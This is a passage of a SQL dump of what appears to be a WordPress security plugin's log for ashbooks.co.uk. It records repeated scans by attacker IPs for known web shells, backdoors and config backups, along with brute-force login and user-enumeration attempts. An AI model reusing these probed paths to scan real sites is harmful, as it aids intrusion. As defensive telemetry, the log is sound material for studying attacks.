index.php'),('40.69.131.238',675644398,'',0,1637119703.1306,55,'S8pjUd4THfGI61y0sRavhiWg','','19|0|0|0|ashbooks.co.uk/config.bak.php'),('40.69.131.238',675644398,'',0,1637119704.9807,55,'sVEMyd4A0D5ZeXgPbJBUYctS','','19|0|0|0|ashbooks.co.uk/wp-admin/config.bak.php'),('40.69.131.238',675644398,'',0,1637119706.8861,55,'mNy3g5qXkvAJG9xVewIOPu2R','','19|0|0|0|ashbooks.co.uk/wp-content/config.bak.php'),('40.69.131.238',675644398,'',0,1637119709.0463,55,'P1GBto4EQ3Key8INnFqpwrAO','','19|0|0|0|ashbooks.co.uk/wp-includes/config.bak.php'),('40.69.131.238',675644398,'',0,1637119711.1190,55,'Mfn0Qh7ePw5BIG9KxWc32mE6','','19|0|0|0|ashbooks.co.uk/wp-content/themes/config.bak.php'),('40.69.131.238',675644398,'',0,1637119714.0333,55,'Kisj18kcodlqOvrCEQe7Py0N','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/config.bak.php'),('40.69.131.238',675644398,'',0,1637119715.1833,18,'FAuVWihSMeRs8f93GKXmNgBU','','13|0|0|0|ashbooks.co.uk/wp-includes/css/wp-config.php'),('40.69.131.238',675644398,'',0,1637119717.6128,55,'DsL2VoNUlgp0a85ZG31wXxKe','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('40.69.131.238',675644398,'',0,1637119719.4348,100,'NlMbUzpFL5xcVQT2B3jnsd0y','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637119721.4732,100,'gxdcO5hXwURYTlpr4WMjfoCK','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637119723.3616,55,'mza21FZP08MJGijcuH5kNtwl','','19|0|0|0|ashbooks.co.uk/haders.php'),('40.69.131.238',675644398,'',0,1637119725.7330,100,'j8xb47HI0lhDrfLWNJGcXCSz','','13|0|0|0|ashbooks.co.uk/wp-content/wp-old-index.php'),('40.69.131.238',675644398,'',0,1637119728.0843,55,'WGhxZ7TzQriMp8CenEwuSaPF','','19|0|0|0|ashbooks.co.uk/legion.php'),('40.69.131.238',675644398,'',0,1637119730.0677,55,'Vm3Fiwr75RzKNDhU2oWEnSLM','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('40.69.131.238',675644398,'',0,1637119732.0715,55,'pNvhUTCkdAm9w3lbgQZ0tKOP','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('40.69.131.238',675644398,'',0,1637119734.0670,55,'aVhoJcf5ejSY1TRPM3H4qyLD','','19|0|0|0|ashbooks.co.uk/wp-includes/small.php'),('40.69.131.238',675644398,'',0,1637119735.9164,55,'gZK5f8mNDYbdVnjvBcr1HP4C','','19|0|0|0|ashbooks.co.uk/up.php'),('40.69.131.238',675644398,'',0,1637119737.8913,55,'id6KS3yoCxqBlcGUHJ5XL4zW','','19|0|0|0|ashbooks.co.uk/upload.php'),('40.69.131.238',675644398,'',0,1637119740.1127,55,'nBijyH8wl2Q0MvSmk6GrJ5KD','','19|0|0|0|ashbooks.co.uk/config.php'),('40.69.131.238',675644398,'',0,1637119742.3789,100,'ugafOUlqQtLbc18725VerK6o','','13|0|0|0|ashbooks.co.uk/test.php'),('40.69.131.238',675644398,'',0,1637119744.0277,55,'jbt2q70Qf6xNIzXJEPBgk53p','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('40.69.131.238',675644398,'',0,1637119746.1635,55,'Re7oauZPEKc5nflik3w9DMJr','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('40.69.131.238',675644398,'',0,1637119748.0730,55,'9DFGjqJQ5ntLzINX4kV1Z7iO','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'),('204.12.198.245',3423389429,'admin',0,1637121726.8137,7,'Kh1QzNyimJRcA9BotlGEIHv5','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('40.69.131.238',675644398,'',0,1637122161.4884,55,'PLkzpSiOg6GRQBx9undwaI7K','','19|0|0|0|ashbooks.co.uk/style.php'),('40.69.131.238',675644398,'',0,1637122163.4913,55,'8HVfW6UnyzA02sLIQ9rFKwmG','','19|0|0|0|ashbooks.co.uk/moduless.php'),('40.69.131.238',675644398,'',0,1637122166.1373,100,'DqzJSHMEt70Y6lT23KgroacO','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('40.69.131.238',675644398,'',0,1637122168.2528,55,'sBo5jGn0rE9xKyeIM2kgqctS','','19|0|0|0|ashbooks.co.uk/admin.php'),('40.69.131.238',675644398,'',0,1637122170.9713,100,'9SogbtKjnGBQc2ayIDHx0YNT','','13|0|0|0|ashbooks.co.uk/index.php'),('40.69.131.238',675644398,'',0,1637122179.2949,100,'InvzNSATrq4oDtUJQ21ZWFw6','','13|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637122181.9230,55,'MuijvwfDCWH2VaJrcSmYNh1Q','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('40.69.131.238',675644398,'',0,1637122184.4361,55,'vGSfF7hKOqcty52A8kzexgX6','','19|0|0|0|ashbooks.co.uk/wp-content/db_cache.php'),('40.69.131.238',675644398,'',0,1637122186.9816,100,'OsMEGJyrAcB2mTjlk9DCtuew','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('40.69.131.238',675644398,'',0,1637122191.6389,100,'FrfjgquTl5z4eCcsYnw2yEP0','','13|0|0|0|ashbooks.co.uk/wpindex.php'),('40.69.131.238',675644398,'',0,1637122194.6586,100,'6ya5zoFIcNAxGQjD4ipPMLBT','','13|0|0|0|ashbooks.co.uk/larva.php'),('40.69.131.238',675644398,'',0,1637122197.0565,100,'zoNxR8DFS7qfdeBUvV3IP1ZQ','','13|0|0|0|ashbooks.co.uk/th3_err0r.php'),('40.69.131.238',675644398,'',0,1637122199.8369,55,'OuisTD7nrZtKzMd1846Y3NLH','','19|0|0|0|ashbooks.co.uk/alfindex.php'),('40.69.131.238',675644398,'',0,1637122202.4073,55,'s9yaGEVfhgBk6wJHUZ0rDCqN','','19|0|0|0|ashbooks.co.uk/alfa.php'),('40.69.131.238',675644398,'',0,1637122215.8285,55,'a0CSXO4DIyHPV5bq1TJijd2e','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('40.69.131.238',675644398,'',0,1637122241.1696,55,'nuJL4UBFjb0z3VmKdqhlMrio','','19|0|0|0|ashbooks.co.uk/cindex.php'),('40.69.131.238',675644398,'',0,1637122248.5382,55,'rWXCo8qh9bDRISTAs4BlUmJK','','19|0|0|0|ashbooks.co.uk/wp-content/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637122251.7498,55,'7pdKxV9utsOJkGib54SvjC2X','','19|0|0|0|ashbooks.co.uk/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637122254.6560,55,'fIzYD4nvG7UeoQR31qSsKrMy','','19|0|0|0|ashbooks.co.uk/wp-includes/fonts/css.php'),('40.69.131.238',675644398,'',0,1637122257.1097,55,'lBeyWgPEH8KCrpXxMu6thVIj','','19|0|0|0|ashbooks.co.uk/wp-includes/css/css.php'),('40.69.131.238',675644398,'',0,1637122259.6738,55,'udgmPlRNxHZnQcTW6rsDXeFY','','19|0|0|0|ashbooks.co.uk/old-index.php'),('40.69.131.238',675644398,'',0,1637122261.8309,55,'Z9G2EDhiVgsfOX0a4jTm1Cr7','','19|0|0|0|ashbooks.co.uk/config.bak.php'),('40.69.131.238',675644398,'',0,1637122264.5497,55,'JTVkfMavtXAKPcroSu5RLZ2W','','19|0|0|0|ashbooks.co.uk/wp-admin/config.bak.php'),('40.69.131.238',675644398,'',0,1637122267.4123,55,'BAerR9zfxSpsJkdN5ctUEDX4','','19|0|0|0|ashbooks.co.uk/wp-content/config.bak.php'),('40.69.131.238',675644398,'',0,1637122270.1403,55,'RCYgUQsNW9J2f1hdPEK8jv6F','','19|0|0|0|ashbooks.co.uk/wp-includes/config.bak.php'),('40.69.131.238',675644398,'',0,1637122272.6381,55,'g8YiL3Oqoc7prlAHCQR6KsnG','','19|0|0|0|ashbooks.co.uk/wp-content/themes/config.bak.php'),('40.69.131.238',675644398,'',0,1637122274.8235,55,'RivNy3TAI9hKPoVpdgmWJ8zn','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/config.bak.php'),('40.69.131.238',675644398,'',0,1637122276.3846,18,'XJHTNLrqdicS418zmDMaRFYn','','13|0|0|0|ashbooks.co.uk/wp-includes/css/wp-config.php'),('40.69.131.238',675644398,'',0,1637122278.4496,55,'o5MT8n3CLB0y2twZxvU69jiV','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('40.69.131.238',675644398,'',0,1637122280.6477,100,'9kSRm6WDdzajPcboAJ3Mh4N1','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637122283.1805,100,'9fFz4hmsjt6QTdM0oO1xRCVS','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637122285.4800,55,'lQXma9AoIYdZ2ig8cGt7CuR0','','19|0|0|0|ashbooks.co.uk/haders.php'),('40.69.131.238',675644398,'',0,1637122288.0556,100,'1uQwricaYVnXdJeP6ySUAWhF','','13|0|0|0|ashbooks.co.uk/wp-content/wp-old-index.php'),('192.187.127.21',3233513237,'ashbooks',0,1637122288.5264,51,'Rjl62xnoEztVSqhcNgWAfHZX','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('40.69.131.238',675644398,'',0,1637122290.0225,55,'ZvsoiPjc2U5LQ3ztnWf0AJu6','','19|0|0|0|ashbooks.co.uk/legion.php'),('40.69.131.238',675644398,'',0,1637122292.1580,55,'QukEeY0zUt9fZ4g82pDXMJVL','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('40.69.131.238',675644398,'',0,1637122294.4245,55,'tWwrSVID6FUx4iABdmPXzolK','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('40.69.131.238',675644398,'',0,1637122296.6909,55,'FCwnM3H7isyLbUt2v6DBjKmE','','19|0|0|0|ashbooks.co.uk/wp-includes/small.php'),('40.69.131.238',675644398,'',0,1637122299.3393,55,'zwG0aPeO43l6QC2DrsbdEWfR','','19|0|0|0|ashbooks.co.uk/up.php'),('40.69.131.238',675644398,'',0,1637122301.3480,55,'sGPVfQW0UyFwJnKuTBjAZlDr','','19|0|0|0|ashbooks.co.uk/upload.php'),('40.69.131.238',675644398,'',0,1637122303.3361,55,'l3NRVYEgCJxA9q84a7pZHjeQ','','19|0|0|0|ashbooks.co.uk/config.php'),('40.69.131.238',675644398,'',0,1637122305.3629,100,'pVQzyHiDModanPmLc60jCWBR','','13|0|0|0|ashbooks.co.uk/test.php'),('40.69.131.238',675644398,'',0,1637122307.4185,55,'MQJSaiqhCy50lXExU8AoOKtW','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('40.69.131.238',675644398,'',0,1637122309.5590,55,'bJsHwhivan1SNGyfX4AFVQkT','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('40.69.131.238',675644398,'',0,1637122311.6428,55,'TdyKm0hb93cvqXx5OVkipJ4u','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'),('107.150.48.236',1805005036,'admin',0,1637127408.7275,7,'8vV9iHlTQ74FpXh3LDIrGjeO','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('69.30.217.108',1159649644,'ashbooks',0,1637128030.5049,51,'69wFSKa2iObpPDMGLuYtvXrq','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.191.34.215',3116311255,'',0,1637129901.9458,55,'a2Fciq5QDJ4h0zA3jB8UuRxO','','19|0|0|0|ashbooks.co.uk/wp-admin/css/colors/light/colors.php'),('185.191.34.215',3116311255,'',0,1637129901.9465,55,'lAacBk3zv9hs4Ex6WH2CUOGT','','19|0|0|0|ashbooks.co.uk/wp-admin/css/colors/light/colors.php'),('69.30.240.27',1159655451,'admin',0,1637133610.6507,7,'OYAzjJ5489LtZVgEXSsITG0P','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('69.30.240.27',1159655451,'ashbooks',0,1637134588.1127,51,'2lj7JwQNvOFtnyKrT8fCX35U','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.118.205',3233511117,'admin',0,1637138974.0031,7,'BGRTIjrPE7AqKemkODf92LNJ','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('185.191.34.215',3116311255,'',0,1637140020.4340,55,'USG36PwWeVtFnbNy7j5Tdh4C','','19|0|0|0|ashbooks.co.uk/wp-content/uploads/2019/index.php'),('192.187.118.206',3233511118,'admin',0,1637144161.1070,7,'cTBzprnoqV9gXHh7OCyWixGS','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('204.12.198.244',3423389428,'ashbooks',0,1637144601.9814,51,'8xu9PW0kneJQ5OfbRF7UqgIp','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.218.225',2994789089,'',0,1637146980.1389,70,'x92aSZzyDjXlrH4oTmEBwFVY','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('178.128.218.225',2994789089,'',0,1637147432.9169,70,'4CuOWRmJyF9B8nfPh0cX3IEH','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('185.191.34.215',3116311255,'',0,1637148790.0229,55,'P4vrnAFDsJXlidIhuocR8L20','','19|0|0|0|ashbooks.co.uk/wp-includes/Requests/Exception/HTTPS.php'),('143.244.45.131',2415144323,'',0,1637149377.5038,70,'QYjKlgCvI574JLdANeSnmZVH','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('192.187.127.22',3233513238,'admin',0,1637151962.5829,7,'yQ4EAqosFJCvPVStmghwpY2I','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('194.163.133.151',3265496471,'admin',0,1637152237.6683,7,'50jpRce31OobFuWSvN9t7IKA','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('40.69.131.238',675644398,'',0,1637152810.0800,55,'YPEQNZsHoGFO3cWCR2Ivrmld','','19|0|0|0|ashbooks.co.uk/style.php'),('40.69.131.238',675644398,'',0,1637152813.0414,55,'zhIVbZtTQq3vkBmO0UWNwf92','','19|0|0|0|ashbooks.co.uk/moduless.php'),('40.69.131.238',675644398,'',0,1637152816.3976,55,'wrBRqYjFVX9acpv6ZQGNxePJ','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('40.69.131.238',675644398,'',0,1637152818.7800,55,'wairGvMjb1AFc3Zx0RypsWoL','','19|0|0|0|ashbooks.co.uk/admin.php'),('40.69.131.238',675644398,'',0,1637152824.3497,55,'74B3tibfrnMceVp8qXsyQNGD','','19|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637152824.4009,10,'74B3tibfrnMceVp8qXsyQNGD','','707|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637152827.6174,55,'wWH4psVtcMxOfkzuXbrUYiP0','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('40.69.131.238',675644398,'',0,1637152829.7616,55,'iTmntNp7AU5jLfd4XSHaKkzW','','19|0|0|0|ashbooks.co.uk/wp-content/db_cache.php'),('40.69.131.238',675644398,'',0,1637152831.6999,100,'BCSi7XhHqPReac4nv6mQLWrN','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('40.69.131.238',675644398,'',0,1637152850.1473,100,'3ekQWYP4KnUMCRJm8zAbOS7o','','13|0|0|0|ashbooks.co.uk/wpindex.php'),('40.69.131.238',675644398,'',0,1637152864.9325,100,'ptScheDKMkrbgEZ70Q3qXiA8','','13|0|0|0|ashbooks.co.uk/larva.php'),('40.69.131.238',675644398,'',0,1637152866.8556,100,'nWKqTCbvSyAdQj2sXkfHg79m','','13|0|0|0|ashbooks.co.uk/th3_err0r.php'),('40.69.131.238',675644398,'',0,1637152869.4367,55,'gldnDyIf4wxUJMzoL8ZQG9ia','','19|0|0|0|ashbooks.co.uk/alfindex.php'),('40.69.131.238',675644398,'',0,1637152871.7032,55,'Y3c4zNonlTG08ihJvMebQrHj','','19|0|0|0|ashbooks.co.uk/alfa.php'),('40.69.131.238',675644398,'',0,1637152873.9758,55,'ZKxjk1Y5RpXzutU0FHhI2omd','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('40.69.131.238',675644398,'',0,1637152876.2836,55,'8mdH1vXS5bZltrxMKuhA4Niy','','19|0|0|0|ashbooks.co.uk/cindex.php'),('40.69.131.238',675644398,'',0,1637152878.5577,55,'yiM2LtDBQWKAahCX0cPYE8bw','','19|0|0|0|ashbooks.co.uk/wp-content/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637152882.4313,55,'eAkIfb41GTHitsmuF76S09qy','','19|0|0|0|ashbooks.co.uk/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637152885.3225,55,'AyMtoF20KmN9BfSn1ECTDeXO','','19|0|0|0|ashbooks.co.uk/wp-includes/fonts/css.php'),('40.69.131.238',675644398,'',0,1637152887.6013,55,'pd3gsPnrHaF4q2DU0YSXj5iZ','','19|0|0|0|ashbooks.co.uk/wp-includes/css/css.php'),('40.69.131.238',675644398,'',0,1637152891.0616,55,'L4VgkQsGNaHKYbmUtoAneROW','','19|0|0|0|ashbooks.co.uk/old-index.php'),('40.69.131.238',675644398,'',0,1637152894.0481,55,'xEv2MrN3DXK68jIQ90nacitC','','19|0|0|0|ashbooks.co.uk/config.bak.php'),('40.69.131.238',675644398,'',0,1637152897.5700,55,'Jwa6ZuthAW0ID254VrpSO9kP','','19|0|0|0|ashbooks.co.uk/wp-admin/config.bak.php'),('40.69.131.238',675644398,'',0,1637152904.3283,55,'3UBF7jR9uzfq5YMbWphdaL1G','','19|0|0|0|ashbooks.co.uk/wp-content/config.bak.php'),('40.69.131.238',675644398,'',0,1637152906.6856,55,'duHbLt4lEgNS8ohCT5Z0BiVv','','19|0|0|0|ashbooks.co.uk/wp-includes/config.bak.php'),('40.69.131.238',675644398,'',0,1637152909.0847,55,'Ap2DLoVa8nFutlMjxS53ZPsH','','19|0|0|0|ashbooks.co.uk/wp-content/themes/config.bak.php'),('40.69.131.238',675644398,'',0,1637152919.6354,55,'ruZe5vsqOmlNDyKWEkUbIx7c','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/config.bak.php'),('40.69.131.238',675644398,'',0,1637152921.6328,18,'SaRW9gNuJdnqULlPcQmz7hoA','','13|0|0|0|ashbooks.co.uk/wp-includes/css/wp-config.php'),('40.69.131.238',675644398,'',0,1637152924.4777,55,'2gZQ0v5lmi1Lok6FwtIWXha3','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('40.69.131.238',675644398,'',0,1637152927.0242,100,'VKPGMnDoixWyAtEZ47O5vTgS','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637152929.6041,100,'De7ftC3RizlIoTKjw0p6Fc4X','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637152931.6811,55,'DLBrTfMdVI9gbm0XaZAqQ7WR','','19|0|0|0|ashbooks.co.uk/haders.php'),('40.69.131.238',675644398,'',0,1637152934.0274,100,'T5C20UWsROAJfMoVwjE7ePdl','','13|0|0|0|ashbooks.co.uk/wp-content/wp-old-index.php'),('40.69.131.238',675644398,'',0,1637152936.3399,55,'muSGtspWhH6XUNKRzoIQjqe9','','19|0|0|0|ashbooks.co.uk/legion.php'),('40.69.131.238',675644398,'',0,1637152939.2143,55,'PCRg1VHrzQq3J0UBEN4cnuo9','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('40.69.131.238',675644398,'',0,1637152941.6288,55,'Q1pfKOUeIg546CAyoGRZdYsl','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('40.69.131.238',675644398,'',0,1637152943.8167,55,'k2Z7TlI8do91HOKL0XV6iUcr','','19|0|0|0|ashbooks.co.uk/wp-includes/small.php'),('40.69.131.238',675644398,'',0,1637152945.8330,55,'D6VWZTiPeUk7x95L8KNlXSws','','19|0|0|0|ashbooks.co.uk/up.php'),('40.69.131.238',675644398,'',0,1637152948.9898,55,'pfeWqT4tPO5VZ2ohx1kvGAXj','','19|0|0|0|ashbooks.co.uk/upload.php'),('40.69.131.238',675644398,'',0,1637152951.4043,55,'LVb8NXWapuOGHcPAeQolm9sC','','19|0|0|0|ashbooks.co.uk/config.php'),('40.69.131.238',675644398,'',0,1637152953.6458,100,'Ypxym90t81NsOGLaQZC5vfAJ','','13|0|0|0|ashbooks.co.uk/test.php'),('40.69.131.238',675644398,'',0,1637152959.2544,55,'iZU9XF5cOK0Mq4a1nx2yfGJD','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('40.69.131.238',675644398,'',0,1637152961.3723,55,'AUmKWdCzTIfg9i6pE40MwoG2','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('40.69.131.238',675644398,'',0,1637152964.8321,55,'hPcoijLA6fZ5nMu1qt7amxKN','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'),('69.30.225.182',1159651766,'ashbooks',0,1637153424.8618,51,'vC6biekqNVItOpD4d8yn9Xxh','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('104.248.1.96',1761083744,'',0,1637153535.6997,55,'N40WpzIJaqD2179RY8OQkPws','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/wp-sph/sh/config.php'),('104.154.85.100',1754944868,'admin',0,1637153588.3805,7,'2iFlEMUoywpe7BjQxf6NSPtn','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('96.125.171.153',1618848665,'admin',0,1637155004.0936,7,'E14p6Cwh0IHUZbMYxkBreAgN','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('139.59.85.224',2335921632,'admin',0,1637156554.5257,7,'A3qMQSZgfUJoVLY7Erb0Xs6n','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('18.191.58.123',314522235,'',0,1637156806.8506,70,'fvQqtSlLmR5kTobVD7zE0wC6','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users'),('81.88.52.168',1364735144,'admin',0,1637158238.1655,7,'Bw8ZpsSQHyugMxTimW0EhRqC','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.28.49.63',1729900863,'admin',0,1637159812.4978,7,'WGjENCFTo0iA42XH9PLnxMrB','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.231.155',1159653275,'admin',0,1637160605.6605,7,'CPgUoat35OvIy8np4LzGc1xq','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('187.51.127.28',3140714268,'admin',0,1637161318.1604,7,'9MWBHLEaKCfJOgh3QlF0ZXtc','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.127.22',3233513238,'ashbooks',0,1637161976.7402,51,'wKofRM0LtXzkSlYmC82s39y6','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('149.202.23.213',2513049557,'admin',0,1637164479.6803,7,'fUwoZXE6Qrh25NuvCFyqeLSd','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('54.38.181.202',908506570,'admin',0,1637166171.0241,7,'7u0KNCMgXoItv5Rf3H8mplQc','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('111.231.4.211',1877411027,'admin',0,1637167698.6446,7,'XmOUzEcWnYKhqudRJQGCS37H','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.231.155',1159653275,'admin',0,1637167978.0037,7,'fRsONAojVed7ZPH0tgvmyWxD','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('5.188.62.214',96222934,'wordcamp',0,1637168370.1857,51,'DYrsOKLlVfEFzxiZ3MBh6v8y','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.240.28',1159655452,'ashbooks',0,1637170478.5372,51,'uGzvYEkd5pRD09q1fatxQLXT','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.214',96222934,'adminlin',0,1637170537.3153,51,'Rp0qgloLDjMefwaZB9duAHXE','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.189.133.114',96306546,'admin',0,1637172507.0190,7,'L5OJZ60AxUTj9WMp3SulBIw8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('47.242.19.52',804393780,'admin',0,1637174077.4916,7,'5zJmQasi08GkjYrqeKfBOTd1','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.149.154.8',1737857544,'admin',0,1637175589.0858,7,'LuMiV19tYqAygmCowe0USsPI','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('40.69.131.238',675644398,'',0,1637175957.9087,55,'QhB5sPNS98nqZUJ7C1RrdDMj','','19|0|0|0|ashbooks.co.uk/style.php'),('40.69.131.238',675644398,'',0,1637175959.9121,55,'0LQEpRJ91SV7aIwrNudlcs4U','','19|0|0|0|ashbooks.co.uk/moduless.php'),('40.69.131.238',675644398,'',0,1637175962.5590,55,'hQLxrvoZMnj7bm2T45E1eYUK','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('40.69.131.238',675644398,'',0,1637175965.0366,55,'9VTvajgb6miO3dsMJXxUfPWk','','19|0|0|0|ashbooks.co.uk/admin.php'),('40.69.131.238',675644398,'',0,1637175973.0488,55,'SsWaqKIdkvX1fhborB8niUj6','','19|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637175973.0810,10,'SsWaqKIdkvX1fhborB8niUj6','','707|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637175975.3889,55,'JxBXngv3E4jGIyk5TfwucPKQ','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('40.69.131.238',675644398,'',0,1637175978.1354,55,'ocP4KVj8EGmJtTWbMdD1UOR9','','19|0|0|0|ashbooks.co.uk/wp-content/db_cache.php'),('40.69.131.238',675644398,'',0,1637175980.5282,100,'v6Bt3Og8jYcU7NbMoD2wLW5R','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('40.69.131.238',675644398,'',0,1637175984.5936,100,'d3crLzVHhSpYuFgNTW4Kx5wU','','13|0|0|0|ashbooks.co.uk/wpindex.php'),('40.69.131.238',675644398,'',0,1637175986.2912,100,'KRIbvF5CN6rYjpTEsMc2y3fx','','13|0|0|0|ashbooks.co.uk/larva.php'),('40.69.131.238',675644398,'',0,1637175988.5506,100,'4nNK2E3CmXvA6VYlyUSPtGgj','','13|0|0|0|ashbooks.co.uk/th3_err0r.php'),('40.69.131.238',675644398,'',0,1637175990.3230,55,'zsP1SJ75cGaV06KfFuOywrpb','','19|0|0|0|ashbooks.co.uk/alfindex.php'),('40.69.131.238',675644398,'',0,1637175995.2129,55,'yiwFIKb9Sae26mzAUnXTWNjD','','19|0|0|0|ashbooks.co.uk/alfa.php'),('40.69.131.238',675644398,'',0,1637175997.8245,55,'CatBPMwHUJVX3IT7fxdiyAq5','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('40.69.131.238',675644398,'',0,1637175999.8834,55,'thEd1P8oNkquVcjg5xSlUKnp','','19|0|0|0|ashbooks.co.uk/cindex.php'),('40.69.131.238',675644398,'',0,1637176012.9213,55,'fKUOCvWl9ihk3SZJnxGNP6em','','19|0|0|0|ashbooks.co.uk/wp-content/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637176015.2906,55,'VIAKEbjWyC1wziSZeaNkqgvn','','19|0|0|0|ashbooks.co.uk/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637176017.7284,55,'cdAhq1fmt26rYiWXxvCBDkUH','','19|0|0|0|ashbooks.co.uk/wp-includes/fonts/css.php'),('40.69.131.238',675644398,'',0,1637176019.4567,55,'LMtmE1BI597YGajVA8SzsbQU','','19|0|0|0|ashbooks.co.uk/wp-includes/css/css.php'),('40.69.131.238',675644398,'',0,1637176021.0740,55,'DAHvORkuwhITrGQPXBs6jtdz','','19|0|0|0|ashbooks.co.uk/old-index.php'),('40.69.131.238',675644398,'',0,1637176027.4617,55,'Uwlz2tsaW1duihSy3oVG4nTr','','19|0|0|0|ashbooks.co.uk/config.bak.php'),('40.69.131.238',675644398,'',0,1637176029.3852,55,'H06zxVFSkqwJjtvAdecrZmB1','','19|0|0|0|ashbooks.co.uk/wp-admin/config.bak.php'),('40.69.131.238',675644398,'',0,1637176031.6447,55,'ACjSqc3bLsKkheZWtNrayD0U','','19|0|0|0|ashbooks.co.uk/wp-content/config.bak.php'),('40.69.131.238',675644398,'',0,1637176034.0121,55,'NKZj8vyCrowFh2QzT46bsSGx','','19|0|0|0|ashbooks.co.uk/wp-includes/config.bak.php'),('40.69.131.238',675644398,'',0,1637176036.3202,55,'wepiTrtqOzNIclKR3M2YLQ7V','','19|0|0|0|ashbooks.co.uk/wp-content/themes/config.bak.php'),('40.69.131.238',675644398,'',0,1637176038.1202,55,'Twex6SZRBzG5EHrnbdAock7L','','19|0|0|0|ashboo